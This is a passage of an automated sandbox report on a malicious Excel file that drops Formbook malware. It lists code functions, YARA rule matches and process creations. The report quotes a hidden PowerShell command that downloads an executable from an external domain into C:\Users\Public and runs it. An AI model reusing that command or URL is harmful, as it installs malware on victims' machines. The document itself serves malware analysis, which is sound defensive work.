          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD004025_2_07AD0040
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07AD363025_2_07AD3630
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEC5B825_2_07BEC5B8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEBCE825_2_07BEBCE8
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEE05025_2_07BEE050
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BEB9A025_2_07BEB9A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0040103029_2_00401030
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041D96D29_2_0041D96D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041DAB129_2_0041DAB1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041DCBF29_2_0041DCBF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00402D8829_2_00402D88
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00402D9029_2_00402D90
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409E4029_2_00409E40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409E3B29_2_00409E3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041DF9829_2_0041DF98
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CFA329_2_0041CFA3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00402FB029_2_00402FB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F412029_2_012F4120
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DF90029_2_012DF900
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F299029_2_012F2990
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EC1C029_2_012EC1C0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013AE82429_2_013AE824
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA83029_2_012FA830
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D680029_2_012D6800
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130701D29_2_0130701D
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139100229_2_01391002
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013020A029_2_013020A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A20A829_2_013A20A8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB09029_2_012EB090
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013960F529_2_013960F5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A28EC29_2_013A28EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A2B2829_2_013A2B28
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139231B29_2_0139231B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FA30929_2_012FA309
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F336029_2_012F3360
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FAB4029_2_012FAB40
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137CB4F29_2_0137CB4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130EBB029_2_0130EBB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FEB9A29_2_012FEB9A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130138B29_2_0130138B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0137EB8A29_2_0137EB8A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01328BE829_2_01328BE8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013823E329_2_013823E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013903DA29_2_013903DA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130ABD829_2_0130ABD8
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139DBD229_2_0139DBD2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FA2B29_2_0138FA2B
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB23629_2_012FB236
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01395A4F29_2_01395A4F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A32A929_2_013A32A9
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A22AE29_2_013A22AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01394AEF29_2_01394AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E2C529_2_0139E2C5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D0D2029_2_012D0D20
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A2D0729_2_013A2D07
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A1D5529_2_013A1D55
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2D5029_2_012F2D50
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A029_2_013065A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130258129_2_01302581
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D8229_2_01392D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E029_2_012ED5E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A25DD29_2_013A25DD
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F243029_2_012F2430
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E841F29_2_012E841F
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139CC7729_2_0139CC77
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB47729_2_012FB477
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139D46629_2_0139D466
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139449629_2_01394496
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01304CD429_2_01304CD4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A1FF129_2_013A1FF1
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013967E229_2_013967E2
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013ADFCE29_2_013ADFCE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F6E3029_2_012F6E30
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139D61629_2_0139D616
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F560029_2_012F5600
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0135AE6029_2_0135AE60
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01381EB629_2_01381EB6
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A2EF729_2_013A2EF7
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0040103030_2_00401030
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041D96D30_2_0041D96D
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041DAB130_2_0041DAB1
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041DCBF30_2_0041DCBF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00402D8830_2_00402D88
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00402D9030_2_00402D90
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00409E4030_2_00409E40
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00409E3B30_2_00409E3B
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041DF9830_2_0041DF98
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0041CFA330_2_0041CFA3
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00402FB030_2_00402FB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134412030_2_01344120
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0132F90030_2_0132F900
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013499BF30_2_013499BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134A83030_2_0134A830
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013FE82430_2_013FE824
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E100230_2_013E1002
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013520A030_2_013520A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F20A830_2_013F20A8
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133B09030_2_0133B090
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F28EC30_2_013F28EC
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2B2830_2_013F2B28
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134A30930_2_0134A309
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0134AB4030_2_0134AB40
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135EBB030_2_0135EBB0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013D23E330_2_013D23E3
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E03DA30_2_013E03DA
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013EDBD230_2_013EDBD2
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135ABD830_2_0135ABD8
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013DFA2B30_2_013DFA2B
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F22AE30_2_013F22AE
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E4AEF30_2_013E4AEF
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01320D2030_2_01320D20
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2D0730_2_013F2D07
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F1D5530_2_013F1D55
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0135258130_2_01352581
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E2D8230_2_013E2D82
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133D5E030_2_0133D5E0
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F25DD30_2_013F25DD
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0133841F30_2_0133841F
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013ED46630_2_013ED466
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013E449630_2_013E4496
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F1FF130_2_013F1FF1
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013FDFCE30_2_013FDFCE
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_01346E3030_2_01346E30
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013ED61630_2_013ED616
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_013F2EF730_2_013F2EF7
          Source: 5901777.xlsOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
          Source: 5901777.xlsOLE indicator, VBA macros: true
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 0041BBE0 appears 38 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 0132D08C appears 48 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 012DB150 appears 159 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 01365720 appears 85 times
          Source: C:\Users\Public\oftmhayq.exeCode function: String function: 0132B150 appears 133 times
          Source: oftmhayq.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: oftmhayq.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: oftmhayq.exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vlc.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 5901777.xls, type: SAMPLEMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: oftmhayq.exe.20.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vlc.exe.25.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winXLS@16/12@2/1
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_01
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3E27D0C2-EB48-412A-8CE4-AD42CAD017F3} - OProcSessId.datJump to behavior
          Source: 5901777.xlsOLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\Public\oftmhayq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\Public\oftmhayq.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 5901777.xlsVirustotal: Detection: 23%
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: unknownProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe'
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe' Jump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exeJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exeJump to behavior
          Source: C:\Users\Public\oftmhayq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
          Source: Binary string: wntdll.pdbUGP source: oftmhayq.exe, 0000001D.00000002.535167655.00000000013CF000.00000040.00000001.sdmp, oftmhayq.exe, 0000001E.00000002.487705412.000000000141F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: oftmhayq.exe

          Data Obfuscation:

          barindex
          Suspicious powershell command line foundShow sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730EB90 pushad ; ret 24_2_0730EBAA
          Source: C:\Users\Public\oftmhayq.exeCode function: 24_2_0730219F push E9000001h; ret 24_2_073021A4
          Source: C:\Users\Public\oftmhayq.exeCode function: 25_2_07BE219F push E9000001h; ret 25_2_07BE21A4
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_004178AD push 00000001h; retf 29_2_0041796C
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_004172D7 push edi; retf 29_2_004172DA
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00419D5A push ebp; iretd 29_2_00419D5E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0040D695 push esp; ret 29_2_0040D699
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CEB5 push eax; ret 29_2_0041CF08
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CF6C push eax; ret 29_2_0041CF72
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CF02 push eax; ret 29_2_0041CF08
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0041CF0B push eax; ret 29_2_0041CF72
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0132D0D1 push ecx; ret 29_2_0132D0E4
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_004178AD push 00000001h; retf 30_2_0041796C
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_004172D7 push edi; retf 30_2_004172DA
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_00419D5A push ebp; iretd 30_2_00419D5E
          Source: C:\Users\Public\oftmhayq.exeCode function: 30_2_0040D695 push esp; ret 30_2_0040D699
